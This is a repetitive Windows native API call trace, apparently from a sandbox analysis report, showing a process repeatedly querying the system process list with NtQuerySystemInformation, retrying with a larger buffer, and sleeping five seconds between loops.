ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.029] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.030] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.031] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.034] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.034] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.038] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.038] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.040] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.040] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.041] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.045] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.047] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.051] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.058] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.060] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.064] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.066] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.067] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.067] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.071] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.077] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.078] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.083] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.084] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.086] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.086] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.087] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.090] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.090] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.093] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.097] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.098] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.099] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.100] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.103] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.104] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.106] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.106] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.107] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.110] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.111] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.112] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.113] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.113] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.113] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.117] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.117] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.119] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.126] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.127] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.129] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.129] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.133] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.133] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.140] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.147] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.155] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.162] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.162] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.164] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.166] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.171] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 